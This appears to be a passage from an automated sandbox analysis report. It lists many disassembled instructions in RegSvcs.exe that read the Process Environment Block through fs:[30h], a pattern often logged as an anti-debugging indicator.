Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132324 mov eax, dword ptr fs:[00000030h] 7_2_01132324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011A035C mov eax, dword ptr fs:[00000030h] 7_2_011A035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B035C mov eax, dword ptr fs:[00000030h] 7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B035C mov ecx, dword ptr fs:[00000030h] 7_2_011B035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B2349 mov eax, dword ptr fs:[00000030h] 7_2_011B2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0119634C mov eax, dword ptr fs:[00000030h] 7_2_0119634C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h] 7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h] 7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128397 mov eax, dword ptr fs:[00000030h] 7_2_01128397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h] 7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h] 7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E388 mov eax, dword ptr fs:[00000030h] 7_2_0112E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h] 7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115438F mov eax, dword ptr fs:[00000030h] 7_2_0115438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h] 7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h] 7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h] 7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011383C0 mov eax, dword ptr fs:[00000030h] 7_2_011383C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B63C0 mov eax, dword ptr fs:[00000030h] 7_2_011B63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0114E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011663FF mov eax, dword ptr fs:[00000030h] 7_2_011663FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011403E9 mov eax, dword ptr fs:[00000030h] 7_2_011403E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140218 mov eax, dword ptr fs:[00000030h] 7_2_01140218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112823B mov eax, dword ptr fs:[00000030h] 7_2_0112823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A250 mov eax, dword ptr fs:[00000030h] 7_2_0112A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136259 mov eax, dword ptr fs:[00000030h] 7_2_01136259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B8243 mov eax, dword ptr fs:[00000030h] 7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B8243 mov ecx, dword ptr fs:[00000030h] 7_2_011B8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h] 7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h] 7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134260 mov eax, dword ptr fs:[00000030h] 7_2_01134260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112826B mov eax, dword ptr fs:[00000030h] 7_2_0112826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h] 7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E284 mov eax, dword ptr fs:[00000030h] 7_2_0116E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h] 7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h] 7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B0283 mov eax, dword ptr fs:[00000030h] 7_2_011B0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h] 7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011402A0 mov eax, dword ptr fs:[00000030h] 7_2_011402A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A2C3 mov eax, dword ptr fs:[00000030h] 7_2_0113A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h] 7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h] 7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011402E1 mov eax, dword ptr fs:[00000030h] 7_2_011402E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140535 mov eax, dword ptr fs:[00000030h] 7_2_01140535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h] 7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h] 7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h] 7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h] 7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E53E mov eax, dword ptr fs:[00000030h] 7_2_0115E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h] 7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h] 7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116656A mov eax, dword ptr fs:[00000030h] 7_2_0116656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E59C mov eax, dword ptr fs:[00000030h] 7_2_0116E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132582 mov eax, dword ptr fs:[00000030h] 7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01132582 mov ecx, dword ptr fs:[00000030h] 7_2_01132582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A580 mov ecx, dword ptr fs:[00000030h] 7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A580 mov eax, dword ptr fs:[00000030h] 7_2_0112A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164588 mov eax, dword ptr fs:[00000030h] 7_2_01164588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h] 7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011545B1 mov eax, dword ptr fs:[00000030h] 7_2_011545B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011365D0 mov eax, dword ptr fs:[00000030h] 7_2_011365D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h] 7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A5D0 mov eax, dword ptr fs:[00000030h] 7_2_0116A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h] 7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E5CF mov eax, dword ptr fs:[00000030h] 7_2_0116E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E5E7 mov eax, dword ptr fs:[00000030h] 7_2_0115E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011325E0 mov eax, dword ptr fs:[00000030h] 7_2_011325E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h] 7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C5ED mov eax, dword ptr fs:[00000030h] 7_2_0116C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h] 7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h] 7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168402 mov eax, dword ptr fs:[00000030h] 7_2_01168402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A430 mov eax, dword ptr fs:[00000030h] 7_2_0116A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h] 7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h] 7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112E420 mov eax, dword ptr fs:[00000030h] 7_2_0112E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112C427 mov eax, dword ptr fs:[00000030h] 7_2_0112C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B6420 mov eax, dword ptr fs:[00000030h] 7_2_011B6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115245A mov eax, dword ptr fs:[00000030h] 7_2_0115245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116E443 mov eax, dword ptr fs:[00000030h] 7_2_0116E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A471 mov eax, dword ptr fs:[00000030h] 7_2_0113A471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h] 7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h] 7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115A470 mov eax, dword ptr fs:[00000030h] 7_2_0115A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BC460 mov ecx, dword ptr fs:[00000030h] 7_2_011BC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011644B0 mov ecx, dword ptr fs:[00000030h] 7_2_011644B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011264BA mov eax, dword ptr fs:[00000030h] 7_2_011264BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BA4B0 mov eax, dword ptr fs:[00000030h] 7_2_011BA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011364AB mov eax, dword ptr fs:[00000030h] 7_2_011364AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011304E5 mov ecx, dword ptr fs:[00000030h] 7_2_011304E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130710 mov eax, dword ptr fs:[00000030h] 7_2_01130710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01160710 mov eax, dword ptr fs:[00000030h] 7_2_01160710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C700 mov eax, dword ptr fs:[00000030h] 7_2_0116C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h] 7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116273C mov ecx, dword ptr fs:[00000030h] 7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116273C mov eax, dword ptr fs:[00000030h] 7_2_0116273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AC730 mov eax, dword ptr fs:[00000030h] 7_2_011AC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h] 7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C720 mov eax, dword ptr fs:[00000030h] 7_2_0116C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130750 mov eax, dword ptr fs:[00000030h] 7_2_01130750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BE75D mov eax, dword ptr fs:[00000030h] 7_2_011BE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h] 7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01172750 mov eax, dword ptr fs:[00000030h] 7_2_01172750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4755 mov eax, dword ptr fs:[00000030h] 7_2_011B4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112A740 mov eax, dword ptr fs:[00000030h] 7_2_0112A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116674D mov esi, dword ptr fs:[00000030h] 7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h] 7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116674D mov eax, dword ptr fs:[00000030h] 7_2_0116674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138770 mov eax, dword ptr fs:[00000030h] 7_2_01138770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140770 mov eax, dword ptr fs:[00000030h] 7_2_01140770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011307AF mov eax, dword ptr fs:[00000030h] 7_2_011307AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B07C3 mov eax, dword ptr fs:[00000030h] 7_2_011B07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C7F0 mov eax, dword ptr fs:[00000030h] 7_2_0116C7F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h] 7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011347FB mov eax, dword ptr fs:[00000030h] 7_2_011347FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h] 7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h] 7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011527ED mov eax, dword ptr fs:[00000030h] 7_2_011527ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BE7E1 mov eax, dword ptr fs:[00000030h] 7_2_011BE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01172619 mov eax, dword ptr fs:[00000030h] 7_2_01172619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE609 mov eax, dword ptr fs:[00000030h] 7_2_011AE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114E627 mov eax, dword ptr fs:[00000030h] 7_2_0114E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01166620 mov eax, dword ptr fs:[00000030h] 7_2_01166620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168620 mov eax, dword ptr fs:[00000030h] 7_2_01168620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113262C mov eax, dword ptr fs:[00000030h] 7_2_0113262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114C640 mov eax, dword ptr fs:[00000030h] 7_2_0114C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01162674 mov eax, dword ptr fs:[00000030h] 7_2_01162674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h] 7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A660 mov eax, dword ptr fs:[00000030h] 7_2_0116A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114266C mov eax, dword ptr fs:[00000030h] 7_2_0114266C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h] 7_2_01134690
